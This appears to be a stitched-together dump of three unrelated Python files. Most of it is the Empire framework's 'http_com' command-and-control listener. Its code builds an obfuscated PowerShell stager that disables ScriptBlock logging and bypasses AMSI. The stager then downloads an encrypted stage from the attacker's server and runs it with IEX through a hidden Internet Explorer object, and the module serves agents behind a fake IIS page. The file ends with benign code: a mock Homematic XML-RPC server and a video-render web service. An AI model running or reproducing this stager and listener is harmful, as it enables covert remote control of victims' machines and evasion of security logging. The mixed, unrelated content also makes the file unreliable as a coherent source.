' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print helpers.color("[!] HTTPS selected but no CertPath specified.")
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http_com generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
requestHeader = listenerOptions['RequestHeader']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPF")+"=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(");If($"+helpers.generate_random_script_var_name("GPF")+"){$"+helpers.generate_random_script_var_name("GPC")+"=$"+helpers.generate_random_script_var_name("GPF")+".GetValue($null);If($"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("val")+"=[Collections.Generic.Dictionary[string,System.Object]]::new();$"+helpers.generate_random_script_var_name("val")+".Add")
stager += "('EnableScriptB'+'lockLogging',0);"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("val")+".Add")
stager += "('EnableScriptBlockInvocationLogging',0);"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("=$"+helpers.generate_random_script_var_name("val")+"}")
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.Ams'+'iUtils'"
stager += helpers.randomize_capitalization(');$Ref.GetField(')
stager += "'am'+'siInitFailed','NonPu'+'blic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("K")+"=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$'+helpers.generate_random_script_var_name("K")+'=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$'+helpers.generate_random_script_var_name("K")+'[$_%$'+helpers.generate_random_script_var_name("K")+'.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;"
stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
# add the RC4 packet to a header location
stager += "$c=\"%s: %s" % (requestHeader, b64RoutingPacket)
#Add custom headers if any
modifyHost = False
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
if headerKey.lower() == "host":
modifyHost = True
stager += "`r`n%s: %s" % (headerKey, headerValue)
stager += "\";"
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if modifyHost:
stager += helpers.randomize_capitalization("$ie.navigate2($ser,$fl,0,$Null,$Null);while($ie.busy){Start-Sleep -Milliseconds 100};")
stager += "$ie.navigate2($ser+$t,$fl,0,$Null,$c);"
stager += "while($ie.busy){Start-Sleep -Milliseconds 100};"
stager += "$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;"
stager += "try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$"+helpers.generate_random_script_var_name("K")+")) | IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
else:
print helpers.color("[!] listeners/http_com generate_launcher(): invalid language specification: only 'powershell' is currently supported for this module.")
else:
print helpers.color("[!] listeners/http_com generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http_com generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http_com.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
headers = ""
if customHeaders != []:
crlf = False
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# Host header TLS SNI logic done within http_com.ps1
if crlf:
headers += "`r`n"
else:
crlf = True
headers += "%s: %s" % (headerKey, headerValue)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
else:
print helpers.color("[!] listeners/http_com generate_stager(): invalid language specification, only 'powershell' is current supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http_com generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
print helpers.color("[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
if(-not $IE) {
$Script:IE=New-Object -COM InternetExplorer.Application;
$Script:IE.Silent = $True
$Script:IE.visible = $False
}
else {
$Script:IE = $IE
}
""" % (listenerOptions['Host']['Value'])
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
$Headers = "%s: $RoutingCookie"
$script:Headers.GetEnumerator()| %%{ $Headers += "`r`n$($_.Name): $($_.Value)" }
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $Null, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
$html = $Script:IE.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $Script:IE.document, $Null).InnerHtml
try {
[System.Convert]::FromBase64String($html)
}
catch {$Null}
}
}
catch {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
""" % (listenerOptions['RequestHeader']['Value'])
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
$bytes=$e.GetBytes([System.Convert]::ToBase64String($RoutingPacket));
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
$Headers = ""
$script:Headers.GetEnumerator()| %{ $Headers += "`r`n$($_.Name): $($_.Value)" }
$Headers.TrimStart("`r`n")
try {
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $bytes, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
else:
print helpers.color("[!] listeners/http_com generate_comms(): invalid language specification, only 'powershell' is currently supported for this module.")
else:
print helpers.color('[!] listeners/http_com generate_comms(): no language specified!')
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/')
@app.route('/index.html')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/welcome.png')
def serve_index_helper():
"""
Serves image loaded by index page.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
routingPacket = None
reqHeader = request.headers.get(listenerOptions['RequestHeader']['Value'])
if reqHeader and reqHeader != '':
try:
# decode the routing packet base64 value from the custom HTTP request header location
routingPacket = base64.b64decode(reqHeader)
except Exception as e:
routingPacket = None
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(base64.b64encode(stage), 200)
elif results.startswith('ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 404)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(base64.b64encode(results), 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http_com')
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
try:
requestData = base64.b64decode(request.get_data())
except:
requestData = None
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encrypted_agent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(base64.b64encode(encrypted_agent), 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
elif results == 'VALID':
listenerName = self.options['Name']['Value']
message = "[*] Valid results return by {}".format(clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(base64.b64encode(results), 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
message += "\n[!] Ensure the folder specified in CertPath exists and contains your pem and private key file."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
vccu.py
|
import os
import time
import logging
import threading
from xmlrpc.server import SimpleXMLRPCServer
from xmlrpc.server import SimpleXMLRPCRequestHandler
import xmlrpc.client
import json
LOG = logging.getLogger(__name__)
LOCAL = "127.0.0.1"
LOCALPORT = 2001
DEVICE_DESCRIPTIONS = "devicetypes/json/device_descriptions.json"
class LockingServerProxy(xmlrpc.client.ServerProxy):
"""
ServerProxy implementation with lock when request is executing
"""
def __init__(self, *args, **kwargs):
"""
Initialize new proxy for server and get local ip
"""
self.lock = threading.Lock()
xmlrpc.client.ServerProxy.__init__(self, *args, **kwargs)
def __request(self, *args, **kwargs):
"""
Call method on server side
"""
with self.lock:
parent = xmlrpc.client.ServerProxy
# pylint: disable=E1101
return parent._ServerProxy__request(self, *args, **kwargs)
def __getattr__(self, *args, **kwargs):
"""
Magic method dispatcher
"""
return xmlrpc.client._Method(self.__request, *args, **kwargs)
# Object holding the methods the XML-RPC server should provide.
class RPCFunctions():
def __init__(self):
LOG.debug("RPCFunctions.__init__")
self.remotes = {}
try:
script_dir = os.path.dirname(__file__)
rel_path = DEVICE_DESCRIPTIONS
with open(os.path.join(script_dir, rel_path)) as fptr:
self.devices = json.load(fptr)
except Exception as err:
LOG.debug("RPCFunctions.listDevices: Exception: %s" % err)
self.devices = []
def _askDevices(self, interface_id):
LOG.debug("RPCFunctions._askDevices: waiting")
time.sleep(0.5)
knownDevices = self.remotes[interface_id].listDevices(interface_id)
LOG.debug("RPCFunctions._askDevices: %s" % knownDevices)
t = threading.Thread(name='_pushDevices', target=self._pushDevices, args=(interface_id, ))
t.start()
def _pushDevices(self, interface_id):
LOG.debug("RPCFunctions._pushDevices: waiting")
time.sleep(0.5)
self.remotes[interface_id].newDevices(interface_id, self.devices)
LOG.debug("RPCFunctions._pushDevices: pushed")
def listDevices(self, interface_id):
LOG.debug("RPCFunctions.listDevices: interface_id = %s" % interface_id)
return self.devices
def getServiceMessages(self):
LOG.debug("RPCFunctions.getServiceMessages")
return [['VCU0000001:1', 'ERROR', 7]]
def getValue(self, address, value_key):
LOG.debug("RPCFunctions.getValue: address=%s, value_key=%s" % (address, value_key))
return True
def setValue(self, address, value_key, value):
LOG.debug("RPCFunctions.getValue: address=%s, value_key=%s, value=%s" % (address, value_key, value))
return ""
def init(self, url, interface_id=None):
LOG.debug("RPCFunctions.init: url=%s, interface_id=%s" % (url, interface_id))
if interface_id:
try:
self.remotes[interface_id] = LockingServerProxy(url)
t = threading.Thread(name='_askDevices', target=self._askDevices, args=(interface_id, ))
t.start()
except Exception as err:
LOG.debug("RPCFunctions.init:Exception: %s" % (err))
return ""
class RequestHandler(SimpleXMLRPCRequestHandler):
"""We handle requests to / and /RPC2"""
rpc_paths = ('/', '/RPC2',)
class ServerThread(threading.Thread):
"""XML-RPC server thread to handle messages from CCU / Homegear"""
def __init__(self, local=LOCAL, localport=LOCALPORT):
self._local = local
self._localport = localport
LOG.debug("ServerThread.__init__")
threading.Thread.__init__(self)
# Create proxies to interact with CCU / Homegear
LOG.debug("__init__: Registering RPC methods")
self._rpcfunctions = RPCFunctions()
# Setup server to handle requests from CCU / Homegear
LOG.debug("ServerThread.__init__: Setting up server")
self.server = SimpleXMLRPCServer((self._local, self._localport),
requestHandler=RequestHandler,
logRequests=False)
self._localport = self.server.socket.getsockname()[1]
self.server.register_introspection_functions()
self.server.register_multicall_functions()
LOG.debug("ServerThread.__init__: Registering RPC functions")
self.server.register_instance(
self._rpcfunctions, allow_dotted_names=True)
def run(self):
LOG.info("Starting server at http://%s:%i" %
(self._local, self._localport))
self.server.serve_forever()
def stop(self):
"""Shut down our XML-RPC server."""
LOG.info("Shutting down server")
self.server.shutdown()
LOG.debug("ServerThread.stop: Stopping ServerThread")
self.server.server_close()
LOG.info("Server stopped")
|
main.py
|
#!/usr/bin/env python
#_*_ encoding: utf-8 _*_
import webapp2
import time
import json
import os
import threading
import datetime
from cook import worker as worker # Video render and concat unit
from cook import translate as translate
from convert import jsonhelper as jsonhelper # convert functions about json
from paste import httpserver
import redis
# Global configuration of server environment.
config = {}
config['worker'] = None
config['redis-server'] = os.environ['REDIS_SERVER']
config['redis-server-port'] = '6379'
config['videos-folder'] = '/videos/' # Must have a trailing /
videos_folder = '/videos/' # Must have a trailing /
r = redis.StrictRedis(
host=config['redis-server'], port=config['redis-server-port'], db=0)
def get_single_ffmpeg_cake(fcpcake):
''' input a dict obj, represents a fcp cake
return a dict obj, represents a ffmpeg cake
'''
cake_uid = fcpcake['cake_uid']
cake_range_start = fcpcake['range_start']
cake_range_end = fcpcake['range_end']
layers = []
for each in fcpcake['clips']:
clip_delay_offset = each[
'offset'] # Clip Delay according to the base clip.
layer = {}
layer['resource'] = each['video']['ref'] if '.mp4' in each['video'][
'ref'] else each['video']['ref'] + '.mp4' # G
layer['resource'] = videos_folder + layer['resource']
layer['start'] = cake_range_start - clip_delay_offset # G
layer['end'] = cake_range_end - clip_delay_offset # G
layer['filters'] = [
translate.fcp_effect_to_ffmpeg_filter(every)
for every in each.keys() if 'adjust' in every
]
layer['filters'].extend([
translate.fcp_effect_to_ffmpeg_filter(every)
for every in each.keys() if 'filter' in every
])
layers.append(layer)
return {
'uid': cake_uid,
'layers': layers,
'range_start': cake_range_start,
'range_end': cake_range_end
}
def convert_fcp_to_ffmpeg(grouped_fcp_cakes):
''' convert fcp cakes into ffmpeg cakes '''
ffmpeg_cakes = [
] # The ffmpeg cakes ready to be put on the oven of ffmpeg to cook
for each_fcp_cake_obj in grouped_fcp_cakes:
splitted_fcp_cakes = jsonhelper.split_ranges(each_fcp_cake_obj['hash'],
each_fcp_cake_obj)
for each_single_cake in splitted_fcp_cakes:
ffmpeg_cakes.append(get_single_ffmpeg_cake(each_single_cake))
return ffmpeg_cakes
def process_cakes(jsonobj):
fcp_cakes = jsonobj['cakes']
ffmpeg_cakes = convert_fcp_to_ffmpeg(fcp_cakes)
return ffmpeg_cakes
class ScreenReporter(worker.ReportHandler):
def report(self, messageobj):
print '### Report to screen', str(messageobj)
class RedisReporter(worker.ReportHandler):
def report(self, messageobj):
print '### Report to Redis'
r.set(messageobj['cake_uid'], messageobj['ffmpeg_status'])
def render_ffmpeg_cakes(ffmpeg_cakes):
for idx, each_ffmpeg_cake in enumerate(ffmpeg_cakes):
my_h264_worker = worker.RenderWorker(
codecflag='-crf 18 -preset veryfast')
my_h264_worker.add_handler(handler=ScreenReporter('screen_reporter'))
my_h264_worker.add_handler(handler=RedisReporter('redis_reporter'))
check_thread = threading.Thread(target=my_h264_worker.report_progress)
check_thread.setDaemon(True)
check_thread.start()
my_h264_worker.render(each_ffmpeg_cake,
videos_folder + each_ffmpeg_cake['uid'] + '.mp4')
time.sleep(2) # let the report till the end.
# check_thread.join(60) # Let the thread die in 60 seconds anyway
class RenderSingleCake(webapp2.RequestHandler):
def get(self):
try:
jsonstring = self.request.body
payload = json.loads(jsonstring) # json payload
if payload:
ffmpeg_cakes = process_cakes(payload)
ffmpeg_cakes_uid_list = [each['uid'] for each in ffmpeg_cakes]
return_dict = {'ffmpeg_cakes': ffmpeg_cakes_uid_list}
self.response.out.write(json.dumps(return_dict))
background = threading.Thread(
target=render_ffmpeg_cakes,
args=(ffmpeg_cakes,),
name="rendering-background-serivce")
background.start()
else:
self.error(400)
self.response.out.write('Payload Empty, Check Your Json.')
except Exception as ex:
self.error(400)
